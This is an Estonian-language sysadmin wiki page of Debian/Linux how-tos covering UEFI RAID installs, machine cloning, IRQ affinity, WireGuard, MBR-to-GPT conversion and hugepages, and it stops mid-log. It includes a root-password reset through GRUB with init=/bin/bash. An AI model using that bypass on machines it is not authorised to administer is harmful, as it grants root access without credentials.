D-Bus peal toimuva jälgimiseks sobib kasutada nt d-feet programmi

# apt-get install d-feet

[[Pilt:D-feet-1.gif]]

PlayPause toggleb pausi ja jätkamise vahel, selle rakendamist võib klõpsida hiirega ja öelda Execute või käsurealt

$ dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause
method return sender=:1.913 -> dest=:1.917 reply_serial=2

Samal ajal ütleb dbus-monitor filtreeridest välja töötavale vlc eksemplarile (:1.913) vastused

$ dbus-monitor "sender=:1.913"
...
method return sender=:1.913 -> dest=:1.978 reply_serial=2
signal sender=:1.913 -> dest=(null destination) serial=88 path=/org/mpris/MediaPlayer2; \
interface=org.freedesktop.DBus.Properties; member=PropertiesChanged
string "org.mpris.MediaPlayer2.Player"
array [
dict entry(
string "PlaybackStatus"
variant string "Paused"
)
]
array [
]

Kasulikud lisamaterjalid

* https://wiki.gnome.org/Apps/DFeet
* http://en.wikipedia.org/wiki/D-Bus

===Debian paigaldamine UEFI arvutisse===

Olgu eesmärk paigadada UEFI firmwarega arvutisse Debian v. 8 Jessie, kusjuures kasutatakse kahe füüsilise kõvakettaga mdadm RAID1 lülitust. System setup keskkonnnas näidata moel või teisel, et arvuti töötab UEFI (mitte BIOS emulatsiooni vms) režiimis. Esimeseks boot valikuks valida UEFI shell. Shellis öelda

> fs0:\BOOT\EFI\BOOT...

Tulemusena käivitub Debian Installer (DI), kus tuleb seadistada selline kõvaketaste kasutus

* /dev/sda1 ja /dev/sdb1 - EFI System Partitionid, 512 MB
* /dev/sda2 ja /dev/sdb2 - mdadm mirror, 2 GB, kus hakkab paiknema /boot failisüsteem
* /dev/sda3 ja /dev/sdb3 - mdadm mirror, 24 GB, kus hakkab paiknema operatsioonisüsteem, LVM köidetel
* /dev/system/swap ja /dev/system/root - asub mdadm peal
* /dev/sda4 ja /dev/sdb4 jne - juurutatakse operatsioonisüsteemi keskkonnas

Tundub, et selliselt ettevalmistatud kõvakettakasutusest saab DI hästi aru ja tulemusena tekib selline süsteem

# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/dm-0 11403544 938660 9862568 9% /
udev 10240 0 10240 0% /dev
tmpfs 1631032 8724 1622308 1% /run
tmpfs 4077572 0 4077572 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4077572 0 4077572 0% /sys/fs/cgroup
/dev/md0 1888268 35564 1738736 3% /boot
/dev/sda1 497696 148 497548 1% /boot/efi

Partitsioonid sellised

# parted /dev/sda p
Model: ATA ST2000NM0033-9ZM (scsi)
Disk /dev/sda: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 1049kB 512MB 511MB fat32 efsname boot, esp
2 512MB 2511MB 2000MB sda2part raid
3 2511MB 26.5GB 24.0GB sda3part raid

Lõpuks tuleb kopeerida /dev/sdb1 peale /dev/sda1 failisüsteemi sisu (EFI GRUB bootloader).

# efibootmgr
BootCurrent: 0003
Timeout: 1 seconds
BootOrder: 0003,0009,000D,0000,0001,0002
Boot0000* ATEN Virtual CDROM YS0J
Boot0001* IBA GE Slot 0300 v1404
Boot0002* P0: ST2000NM0033-9ZM175
Boot0003* debian
Boot0009* UEFI: Built-in EFI Shell
Boot000D* UEFI: ATEN Virtual CDROM YS0J

===Arvuti kloonimine===

Arvuti kloonimise tulemusena moodustatakse olemasoleva arvuti tarkvaralisest seistust, st operatsioonisüsteem ja seal töötavad rakendused, töötav koopia. Sõltuvalt asjaoludest, nt kui koopia töötab samas võrgus ja samal ajal lähtepunktiks oleva arvutiga, peab talle seadistama erineva ip aadressi. Kloonimise põhjuseks võib olla nt soov taha arenduspartnerile kättesaadavaks täpselt samasugune seis arvutist nagu on juba kasutada, sel juhul jääb ära vähem või rohkem keerukas arvuti ettevalmistamise aeg, mis kuluks operatsioonisüsteemi ja rakendusprogrammide seaditamisele.

====Kloonimine failisüsteemi kopeerimise teel====

Kloonimiseks on rikkalikult võimalusi, käesolev juhtum kirjeldab kloonimist failisüsteemi kopeerimise teel

* valida välja sobiv klooniks saav arvuti, piisava protsessori, kõvakette, mälu, võrgu jms ressursiga
* käivitada puhas uus klooniks saav arvuti (füüsiline või virtuaalne) systemrescue cd plaadilt
* moodustada fdisk partitsioonid
* tekitada lvm
* tekitada failisüsteemid ja swap

# mkfs.ext4 /dev/sda1
# mkfs.ext4 /dev/system/root
# mkswap -f /dev/system/swap

* ühendada failisüsteemid külge

# mkdir /mnt/root
# mount /dev/system/root
# mkdir /mnt/root/boot
# mount /dev/sda1 /mnt/root/boot

* seadistada võrk
* veenduda, et lähtepunktiks olevas arvutis on klooni riistvara jaoks vajalikud draiverid ja muuud komponendid olemas (LVM, mdadm tugi jms)
* kopeerida rsync abil üle failisüsteem, vajalike eranditega (nt /proc, /sys, /home)

orig# rsync -avHXA --exclude --exclude-deleted --numeric-ids --exclude-from=/root/ex / root@x.x.x.x:/mnt/root/

* tekitada käsitsi excludetud kataloogid

# mkdir proc sys home tmp
# chmod 1777 tmp

* kohendada seadistusfaile

/etc/fstab
/etc/network/interfaces
/etc/udev/rules.d/70-persistent-net.rules

* ühendada külgeühendatud failisüsteemid lahti
* rebootida valikuda 'Boot Linux from hard disk'
* paigaldada bootloader

# install-grub --recheck --no-floppy /dev/sda

* bootida paigaldatud bootloaderi promptist käsitsi

grub> linux /vmlinuz... root=/dev/mapper/system-root ro
grub> initrd /initrd...
grub> boot

* genereerida /boot/grub/grub.conf

# update-grub

====Kopeeritud süsteemi korrastamine====

Kopeeritud süsteemi edasiandmisel võib olla asjakohane pöörata tähelepanu sellistele asjaoludele, st kas ei anta edasi soovimatult palju andmeid

* kasutajate kodukataloogid (.ssh, .pgpass jt)
* root, postgres jt süsteemsete ja muidu alles jäänud kasutajate .bash_history failid

# history -c
# rm .bash_history
...

* cron tööd (/etc/cron.*/*, crontab -l. /var/spool/cron ...)
* /var/backups (passwd.bak, shadow.pak jt)
* varunduse tarkvara agent (nt backupninja)
* monitooringu tarkvara agent (nt zabbix)
* liidestus AD vms keskse kasutajahalduse süsteemiga
* konfiguratsioooni halduse agent (nt puppet)
* logiserverisse logimine
* /tmp, /var/tmp kataloogide sisu
* /var/mail
* /usr/src

===USB data bridge kasutamine===

USB data bridge on kahe otsaga ja keskel asuvad punniga USB kaabel, mille abil saab kaks arvutit omavahel ühendada andmevahetuseks. Üks populaarne kaabel paistab välja sedasi

# lsusb
Bus 001 Device 005: ID 067b:2501 Prolific Technology, Inc. PL2501 USB-USB Bridge (USB 2.0)

Tundub, et Debiani tuumas on mitme sarnase kaabli tugi, aga mitte päris PL2501 oma. Toe tekitamist kirjeldatakse aadressil https://lkml.org/lkml/2012/7/23/106. Muudatuste tegemiseks sobib kasutada tekstis http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Tuuma_kompileerimine kirjeldatud protseduuri.

Peale mooduli laadimist tekib võrguseade

# ifconfig usb0
usb0 Link encap:Ethernet HWaddr a2:68:73:e5:d6:6e
inet6 addr: fe80::a068:73ff:fee5:d66e/64 Scope:Link
...

Kasulikud lisamaterjalid

* http://paulswasteland.blogspot.com.ee/2014/01/getting-prolific-pl-2501-based-usb-to.html

===Single user ehk ühekasutaja režiim===

Juhtumil, kui arvutisse ei saa root kasutajana sisse logida ja pole ka root parooli teada, et konsoolilt sisse logida, saab kasutada single user režiimi ja seal root parool muuta. Selleks tuleb

* GRUB bootloaderis liikuda nooltega meelepärase boot valiku peale
* vajutada e nagu edit (see on ekraani all kirjas)
* liikuda kernel parameetri juurde ja lisada kõige lõppu juurde tühik ning seejärel

init=/bin/bash

* valida ctrl-x vms (see on ekraani all kirjas) ja arvuti bootida

Tulemusena jõuab arvuti välja nn single user prompti. Selles olekus töötab arvutis suhteliselt vähe protsesse, juurfailisüsteem on monteeritud read-only olekus, võrk on seadistamata jne. root kasutaja või mõni muu kasutaja parooli seadmiseks tuleb

* monteerida juurfailisüsteem read-write olekusse

# mount -o rw,remount /
# passwd kasutajanimi
# sync
# mount -o ro,remount /
# sync
# oodata 30 sekundit
# reboot -f

Seejärel peaks saama seda uut parooli kasutada.

===Ksplice kasutamine===

Kasulikud lisamaterjalid

* https://oss.oracle.com/pipermail/ksplice-debian-8.0-updates/

===Arvuti ressursikasutuse kaardistamine===

Protsessid

# ps auxef

Avatud failid

# lsof -n -p PID
# lsof -n -u USER

Võrgusoketid

# lsof -i TCP
# lsof -i UDP
# lsof -U - unix domain sockets

Semafoorid

# ipcs -u

------ Shared Memory Status --------
segments allocated 2
pages allocated 4309411
pages resident 4136103
pages swapped 169536
Swap performance: 0 attempts 0 successes

------ Semaphore Status --------
used arrays = 64
allocated semaphores = 1083

------ Messages Status --------
allocated queues = 0
used headers = 0
used space = 0 bytes

Nt sellise skript kasutamine cron tööna kord minutis võiks koguda midagi, lisaks sar andmestikule

<pre>
# cat /opt/osres/bin/osres.sh
#!/bin/bash

AEG=`date +%Y%m%d-%H%M%S`;
LOG="/var/log/osres";

if test -f /tmp/osres.lock; then
echo "protsess kaib" >> /tmp/osres.log
# echo "kaivitame crontabist osres" >> /tmp/osres.log
else

touch /tmp/osres.lock
echo "protsess kaivitatakse" >> /tmp/osres.log

timeout 20 ps auxef >> ${LOG}/ps-auxef_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 lsof -n >> ${LOG}/lsof-n_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -a >> ${LOG}/ipcs-a_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -u >> ${LOG}/ipcs-u_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 netstat -anp >> ${LOG}/netstat-anp_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 conntrack -L >> ${LOG}/conntrack-L_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 touch /var/lib/postgresql/iocheck/io_${AEG}
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 127.0.0.1 > ${LOG}/ping_127.0.0.1_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 10.0.6.73 > ${LOG}/ping_10.0.6.73_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ssh root@127.0.0.1 "date > ${LOG}/touch-over-ssh_${AEG}.log"
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 dig @10.0.9.4 auul.pri.ee soa >> ${LOG}/dig-10.0.9.4-auul.pri.ee-soa_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
export PGPASSWORD="xxx"
timeout 20 psql -h 10.0.6.174 -U monitoring baas -c "select now();" >> ${LOG}/psql-10.0.6.174-monitoring-portaal_${AEG}.log

rm /tmp/osres.lock

fi
</pre>

===ConsoleKit===

2017 seisuga paistab see olevat vananenud tehnoloogia, kasutatakse systemd-logind.

Kasulikud lisamaterjalid

* TODO

===Võrgukaart - CPU affinity===

TODO

Järgneval viisil tegutsemiseks on vaja ircbalance deemoni töö lõpetada

# systemctl stop irqbalance

Võrgukaardi multi-queue omadused

<pre>
# ethtool -l eth0
Channel parameters for eth0:
Pre-set maximums:
RX: 8
TX: 8
Other: 0
Combined: 0
Current hardware settings:
RX: 2
TX: 2
Other: 0
Combined: 0
</pre>

Võrgukaardi ja cpu ja interrupt vahelised seosed

<pre>
# cat /proc/interrupts | egrep "CPU|eth"
CPU0 CPU1 CPU2 CPU3 CPU4 CPU5 CPU6 CPU7
48: 0 0 0 38 0 1339257 461106 0 PCI-MSI 2097152-edge eth0-0
49: 0 0 1 67 2071270 0 0 143901 PCI-MSI 2097153-edge eth0-1
57: 0 0 1738287 4 0 0 0 0 PCI-MSI 2099200-edge eth1-0
58: 0 3918708 0 38 0 0 0 0 PCI-MSI 2099201-edge eth1-1
</pre>

kus

* 48, 49 jnt on interrupt number

<pre>
# cat /proc/irq/57/smp_affinity
04
</pre>

kus

* hex 04 vastav väärtus on bin 0000 0100
* bin väärtuses olev paremalt kolmandal positsioonil olev '1' tähistab süsteemis olevat kolmandat protsessorit, st alates nullist lugedes CPU2

Affinity muutmiseks, st selle muutmiseks, milline cpu tegeleb millise võrgukaardiga (või võrgukaardi queue'ga) sobib öelda uus cpu number, nt seostamiseks CPU3 protsessoriga

# echo 08 > /proc/irq/57/smp_affinity

CPU numeratsioon

* 0000 0001 (bin) ehk 01 (hex) - esimene (CPU0)
* 0000 0010 (bin) ehk 02 (hex) - teine (CPU1)
* 0000 0100 (bin) ehk 04 (hex) - kolmas (CPU2)
* ...
* 1000 0000 (bin) ehk 80 (hex) - kahesas (CPU7)

Tundub, et võrgukaardi queue'de arvu muutmiseks sobib öelda

# ethtool -L eth0 tx 2
# ethtool -L eth0 rx 2

Siin kirjeldatud viisil tehtud seadistused ei kehtestu peale rebooti.

===Watchdog===

TODO

Kasulikud lisamaterjalid

* https://github.com/miniwark/miniwark-howtos/wiki/Hardware-Watchdog-Timer-setup-on-Ubuntu-12.04
* http://odroid.com/dokuwiki/doku.php?id=en:odroid_linux_watchdog
* https://pve.proxmox.com/wiki/High_Availability
* https://pve.proxmox.com/wiki/High_Availability_Cluster_4.x
* https://lesterlo.wordpress.com/2017/06/23/enable-ipmi-watchdog/
* http://www.madore.org/~david/linux/iTCO-wdt-test.html
* https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/virtualization_administration_guide/section-libvirt-dom-xml-watchdog
* https://casesup.com/using-the-nmi-watchdog-to-detect-hangs/
* https://gist.githubusercontent.com/wmealing/5523247/raw/4dc0474cabc35a9b79cd49fc7eab1f027ea80606/nmi-interrupts.txt
* https://github.com/spotify/linux/blob/master/Documentation/nmi_watchdog.txt

===Softdog===

TODO

===Misc===

* Kopeerimise kiiruse kontrollimine pipe peal

# apt-get install pv
# ssh root@192.168.112.113 'cd /tmp && dd if=/dev/pve/vm-109-disk-1 bs=1M' | pv -L 15m | dd of=/dev/kvmvg/vm-1019-disk-1 bs=1M

===Viber===

Viber https://www.viber.com/ on suhtlemistarkvara, paigaldamiseks sobib öelda nt Debian v. 8 ja v. 9 keskkonnas

# apt-get install libxcb-xkb1 libxcb-icccm4 libxcb-image0 libxcb-render-util0
# apt-get install libqt5gui5
# dpkg -i viber.com

ja käivitamiseks

$ /opt/viber/Viber

Kasulikud lisamaterjalid

* https://daksaitay.noblogs.org/post/2017/01/17/viber-on-debian-8-jessie-desktop/
* http://www.roydoer.com/viber-on-ubuntu-14-04-64bit/

===KeePassX===

MÄRKUS 20190126 - tundub, et õigem projekt on https://en.wikipedia.org/wiki/KeePassXC (C nagu community ja paketinimi keepassxc)

# apt-get intall keepassx

andmebaasi failinime lõpp on .kdbx

===Password Gorilla===

# apt-get install password-gorilla

andmebaasi failinime lõpp on .psafe3

===2018 - Debian v. 9 Stretch paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===2019 - Debian v. 10 Buster paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===linux-perf===

====Paigldamine====

Paigaldamiseks sobib öeld

# apt-get install linux-perf

====Kasutamine====

perf.data faili salvestamine käesolevasse kataloogi

# /usr/bin/perf record -e sched:sched_process_exec -a

Salvestatud andmete loetaval kujul esitamine

# /usr/bin/perf script --header

====Kasulikud lisamaterjalid====

* http://www.brendangregg.com/perf.html

===Wireguard===

====Debian v. 10 Buster====

TODO

Lisada buster-backports repo

TODO

Paigaldada buster-backports repost wireguard

kus

* paigaldatakse wireguard-dkms wireguard-tools wireguard
* paigaldatakse hulka bui

====Debian v. 11 Bullseye====

# apt-get install wireguard

====Debian v. 12 Bookworm====

Töötamine paistab nö serveri poolel

<pre>
root@debian-vpn:~# systemctl status wg-quick@wg0
● wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0
Loaded: loaded (/lib/systemd/system/wg-quick@.service; enabled; preset: enabled)
Active: active (exited) since Tue 2025-04-01 16:46:09 EEST; 9 months 19 days ago
Docs: man:wg-quick(8)
man:wg(8)
https://www.wireguard.com/
https://www.wireguard.com/quickstart/
https://git.zx2c4.com/wireguard-tools/about/src/man/wg-quick.8
https://git.zx2c4.com/wireguard-tools/about/src/man/wg.8
Main PID: 7536 (code=exited, status=0/SUCCESS)
CPU: 30ms

Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip link set mtu 1420 up dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.68/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.170/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.15/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.14/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.13/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.12/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.11/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.10/32 dev wg0
Apr 01 16:46:09 debian-10-vpn systemd[1]: Finished wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0.
</pre>

Seadistusfail

<pre>
/etc/wireguard/wg0.conf
</pre>

===MBR -> GPT partitsioonitabeli teisendamine===

====Tööpõhimõte====

* MBR partitsioonitabel hõlvab tavalisel lihtsal juhul plokkseadme esimsesed 512 Baiti
* GPT partitsioonitabel hõlvab tavaliselt plokkseadme esimsed ja viimased 34 * 512 Baiti
* tundub, et seoses uuema ajal 1 MBait piirile asjade sättimisega algab nii MBR kui GPT puhul esimene partitsioon 2048'ndal sektoril; st plokkseadme alguses on rikkalikult vaba ruumi teisendatud gpt jaoks; probleemiks võib olla, plokkseadme lõpus pole piisavalt vaba ruumi backup gpt jaoks
* sektori suurus on 512 Baiti
* MBR partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 16 baiti, millest 4 baiti ehk 16 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^32*512/1024^3 | bc -> 2048 Gigabyte)
* GPT partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 128 baiti, millest 8 baiti ehk 64 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^64*512/1024^3 | bc -> väga palju)
* muudatuse käigus partitsioone moodustavaid plokke plokkseadmel ümber ei paigutata
* kui mbr partitsioonitabelis on kasutusel ainult primaarsed partitsioonid ning ilma nö aukudeta partitsioonide vahel, siis on tulemuseks samuti ilma aukudeta üksteisele järgnevad gpt partitsioonid
* antud tekst ei kästile seda, aga boot kood asub mbr puhul esimeses 446 baidis
* gpt puhul põhimõtteliselt boot koodi ei ole kasutusel uefi põhises süsteemis (kasutatakse efi partitsiooni)

====Teisendamine====

Olgu lähtepunktiks selline plokkseadme kasutus, mbr partitsioonitabel

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xdaa60afa

Device Boot Start End Sectors Size Id Type
/dev/vdc1 2048 33097727 33095680 15.8G 83 Linux
</pre>

ning partitsioonil üks ext4 failisüsteem, mis on monteeritud

<pre>
# df -h -T /dev/vdc1
Filesystem Type Size Used Avail Use% Mounted on
/dev/vdc1 ext4 16G 1.7G 13G 12% /mnt/vdc1
</pre>

Eesmärk on teisendada partitsioonitabel gpt kujule säilitades seejuures failisüsteemi sisu. Selleks sobib kasutada sellist protseduuri, esmalt monteerida failisüsteem lahti

# umount /dev/vdc1

seejärel teha mbr partitsioonitabelist varukoopia

# dd if=/dev/vdc of=backup.mbr bs=512 count=1

gdisk ehk 'gpt fdisk' programm sobib gpt partitsioonitabeli haldamiseks, sealhulgas vaikimisi ta püüab mbr partitsioonitabeli teisendada gpt kujule. See on tehniliselt tavaliselt võimalik kuna mbr asub plokkseadme alguses ja seal on nö kasutamata ruumi.

<pre>
# gdisk /dev/vdc
GPT fdisk (gdisk) version 0.8.10

Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present

***************************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format
in memory. THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by
typing 'q' if you don't want to convert your MBR partitions
to GPT format!
***************************************************************

Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/vdc.
The operation has completed successfully.
</pre>

kus

* programm tuvastab esmalt, et plokkseadmel on kasutusel MBR partitsioonitabel
* w abil tehakse muudatus
* Y abil kirjutatakse muudatus üles

Kuna Linux operatsioonisüsteemi puhul eristatakse plokkseadmel ja mälus olevat seisu plokkseadme kasutusest, siis tuleks täielikuks muudatuse kehtestamiseks teha lihtsalt reboot arvutile või öelda

# partprobe /dev/vdc

Tulemusena kasutatakse plokkseadmel gpt partitsioonitabelit

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 469E6D74-0022-4200-B0FD-2C5FAED7DCAD

Device Start End Sectors Size Type
/dev/vdc1 2048 33302527 33300480 15.9G Linux filesystem
</pre>

====Muudatuse tagasivõtmine====

Muudatuse tagasivõtmiseks sobib öelda (kuigi nii jääb alles plokkseadme lõppu gpt backup; teatud bios'ide puhul võib see tekitada probleeme, bios on agar ja taastab selle alusel primaarse gpt partitsioonitabeli)

# umount /mnt/vdc1
# dd if=backup.mbr of=/dev/vdc bs=512 count=1
# partprobe /dev/vdc
# mount /dev/vdc1 /mnt/vdc1

====Kasulikud lisamaterjalid====

* https://easylinuxji.blogspot.com/2018/12/what-is-disk-partitioning-disk.html
* https://dannyda.com/2021/05/07/how-to-convert-ubuntu-20-04-1-lts-os-disk-from-mbr-to-gpt-gpt-to-mbr-without-losing-data/
* http://www.rodsbooks.com/gdisk/mbr2gpt.html

===Kasutajakonto operatsioonid===

Konto lukustamine kusjuures see takistab ainult parooliga autentimist, nt ssh võtmega saab sisse

# passwd -l kasutajanimi
# passwd -u kasutajanimi

Konto expire, see takistab igasuguseid kanaleid (eeldab, et pam vms on seadistatud expirega tegelema)

# usermod --expiredate 1 kasutajanimi

===grep kasutamine===

Perl regulaaravalidsega

<pre>
TODO
</pre>

Järjestikulised grep'id ei toimi vahel, aitab nt

<pre>
# tail -f /var/log/pveproxy/access.log | grep --line-buffered "PUT" | grep --line-buffered firewall | grep --line-buffered option
</pre>

===Debian v. 12 ext4 failisüsteem read-only olekus===

Tundub, et kõige tavalisem Debian v. 12 paigaldus, mis kasutab ext4 failisüsteemi (lvm kihi peal) käitub read-only olekus selliselt, et avatud failidesse mingil määral näiliselt kirjutamised jätkuvad. Seejuures kirjutajale jääb mulje, et kirjutamine õnnestus lõpetada edukalt. (Samal ajal uusi faile ei saa tekitada, olemasolevate failide muutmisi ei saa alustada.) Nähtuse jälgimiseks-taaskordamiseks-esilekutsumiseks sobib selline protseduur

1. Proxmox PVE keskkonnas töötab lvm põhisel storage'l Debian v. 12 virtuaalne arvuti; arvutis on kasutusel lvm ja sellel ext4 failisüsteem (lvm ei ole oluline)

2. Alustatakse eemalt pv abil piiratud kiirusega faili kopeerimist (etteruttavalt on siin toodud ära ka kopeeriv cat programmi edukas exit code; fail.img-4 on 36 MB suur)

$ cat fail.img-4 | ssh root@192.168.110.246 'pv -q -L3500K | cat > /root/tere4; echo $?'
0

3. umbes kolmveerandi kopeerimise pealt viiakse PVE host peal virtuaalsele arvutile vastav plokkseade read-only olekusse

# lvchange -pr vg_data/vm-615-disk-2

4. ootus on, et virtuaalne arvuti reageerib sellele oma juurfailisüsteemi read-only olekusse lülitamisega

5. ootus on, et kopeerimine lõpeb edukalt

6. ootus on, et vaatamata read only olekule Debian operatsioonisüsteemi saab veel natuke kasutada, ja küsida (tulemus klapib orig fail.img-4 failiga)

# sha256sum /root/tere4

7. virtuaalne arvuti stop'itakse PVE abil

8. viiakse plokkseade tagasi rw režiimi

# lvchange -prw vg_data/vm-615-disk-2

9. käivitatakse virtuaalne arvuti

10. kõnealune fail, mis näiliselt õnnestus edukalt kopeerida, on väiksema suurusega (või suurusega null)

Märkused

* analoogselt käitub Ubuntu v. 22.04
* Ubuntu v. 22.04 (ja tõenäoliselt Debian v. 12) + ext3 failisüsteem nö hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* Vanemad Ubuntu ja Debian versioonid hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* PVE host peal lvchange ütlemisele alternatiiviks on virtuaalse arvuti siseselt öelda

# echo u > /proc/sysrq-trigger

* lisaks PVE keskkonnale toimub analoogiline nähtus vmware virtuaalse arvutiga

===machine-id reset===

<pre>
# rm /etc/machine-id /var/lib/dbus/machine-id
# dbus-uuidgen | tee /etc/machine-id > /var/lib/dbus/machine-id
# chmod 0444 /etc/machine-id
# ls -ld /etc/machine-id /var/lib/dbus/machine-id
-r--r--r-- 1 root root 33 Apr 7 19:18 /etc/machine-id
-rw-r--r-- 1 root root 33 Apr 7 19:18 /var/lib/dbus/machine-id
</pre>

===Hugepages===

* TLB - Translation Lookaside Buffer
* THP - Transparent Huge Pages

Nö tavalises proxmox pve arvutis on selline hugepagendus

<pre>
root@pm60-trt:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
</pre>

Tundub, et niipea kui käivitatakse virtuaalne arvuti, mis sisaldab parameetrit 'hugepages: ...' tekitatakse kaks juurde

<pre>
root@valgustaja1:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
hugetlbfs 0 0 0 - /run/hugepages/kvm/2048kB
hugetlbfs 0 0 0 - /run/hugepages/kvm/1048576kB
</pre>

ning seda tehakse läbi nö käigult konstrueeritud systemd mount unitite

<pre>
root@valgustaja1:~# systemctl | grep huge
dev-hugepages.mount loaded active mounted Huge Pages File System
run-hugepages-kvm-1048576kB.mount loaded active mounted /run/hugepages/kvm/1048576kB
run-hugepages-kvm-2048kB.mount loaded active mounted /run/hugepages/kvm/2048kB
</pre>

Üks viis 1G hugepagendust lähtestada on kasutades sellist kernel-command-line'i

<pre>
root@valgustaja1:~# cat /proc/cmdline
initrd=\EFI\proxmox\6.8.8-2-pve\initrd.img-6.8.8-2-pve root=ZFS=rpool/ROOT/pve-1 boot=zfs default_hugepagesz=1G hugepagesz=1G hugepages=24
</pre>

Tulemusena paistab

<pre>
root@valgustaja1:~# grep -i huge /proc/meminfo
AnonHugePages: 0 kB
ShmemHugePages: 0 kB
FileHugePages: 0 kB
HugePages_Total: 24
HugePages_Free: 24
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 1048576 kB
Hugetlb: 25165824 kB
</pre>

ning

<pre>
root@valgustaja1:~# hugeadm --explain
Total System Memory: 192906 MB

Mount Point Options
/dev/hugepages rw,relatime,pagesize=1024M
/run/hugepages/kvm/2048kB rw,relatime,pagesize=2M
/run/hugepages/kvm/1048576kB rw,relatime,pagesize=1024M

Huge page pools:
Size Minimum Current Maximum Default
2097152 0 0 0
1073741824 24 24 24 *

Huge page sizes with configured pools:
1073741824

...
</pre>

Kasulikud lisamaterjalid

* https://wiki.postgresql.org/images/7/7d/PostgreSQL_and_Huge_pages_-_PGConf.2019.pdf
* https://pganalyze.com/blog/5mins-postgres-tuning-huge-pages

===reptyr===

reptyr ehk reparenting-terminal võimaldab saada uuesti kontakti kaotatud kuid eksisteeriva terminaliga. Paigaldamiseks sobib öelda

# apt-get install reptyr

Nt apt-get dist-upgrade programm käivitati, aga füüsiline konsool millelt seda tehti riknes. Mujalt arvutisse logides võib olla dist-upgrade tegevus peatunud nt sellises kohas

<pre>
# tail -f /var/log/apt/term.log
...
No DKMS packages installed: not changing Secure Boot validation state.
Setting up libmpc3:amd64 (1.3.1-1) ...
Setting up systemd-timesyncd (252.30-1~deb12u2) ...

Configuration file '/etc/systemd/timesyncd.conf'
